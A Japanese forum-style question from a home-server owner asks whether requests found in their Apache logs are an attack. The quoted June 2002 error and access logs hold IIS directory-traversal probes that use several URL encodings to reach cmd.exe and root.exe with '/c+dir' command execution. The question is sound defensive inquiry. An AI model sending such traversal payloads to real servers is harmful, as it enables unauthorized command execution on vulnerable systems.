フレッツADSLが開通したのを機に自宅サーバを公開しています。最近、apacheのログファイルを覗いて見たところ、不審なアクセスが頻繁に行われている事が判りました。以下がその最新部分のログファイルです。この様なログが1時間に1回程度で記録されています。
内容を見ると、Windowsのexeファイルにアクセスしようとしている様なのですが、IISのバグをねらっているのでしょうか?これっていわゆるアタックなのでしょうか?
【/usr/local/apache/logs/error_log】
[Sun Jun 2 09:28:32 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/root.exe
[Sun Jun 2 09:28:32 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/MSADC/root.exe
[Sun Jun 2 09:28:32 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/c/winnt/system32/cmd.exe
[Sun Jun 2 09:28:33 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/d/winnt/system32/cmd.exe
[Sun Jun 2 09:28:33 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..%5c../winnt/system32/cmd.exe
[Sun Jun 2 09:28:33 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sun Jun 2 09:28:33 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sun Jun 2 09:28:33 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/msadc/..%5c../..%5c../..%5c/..??../..??../..??../winnt/system32/cmd.exe
[Sun Jun 2 09:28:34 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..??../winnt/system32/cmd.exe
[Sun Jun 2 09:28:34 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..政../winnt/system32/cmd.exe
[Sun Jun 2 09:28:34 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..??../winnt/system32/cmd.exe
[Sun Jun 2 09:28:35 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..%5c../winnt/system32/cmd.exe
[Sun Jun 2 09:28:35 2002] [error] [client 61.74.69.145] File does not exist: /home/hnakamur/public_html/scripts/..%2f../winnt/system32/cmd.exe
|
【/usr/local/apache/logs/access_log】
61.74.69.145 - - [02/Jun/2002:09:28:32 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287
61.74.69.145 - - [02/Jun/2002:09:28:32 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326
61.74.69.145 - - [02/Jun/2002:09:28:33 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
61.74.69.145 - - [02/Jun/2002:09:28:34 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
61.74.69.145 - - [02/Jun/2002:09:28:35 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
61.74.69.145 - - [02/Jun/2002:09:28:35 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
61.74.69.145 - - [02/Jun/2002:09:28:35 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
|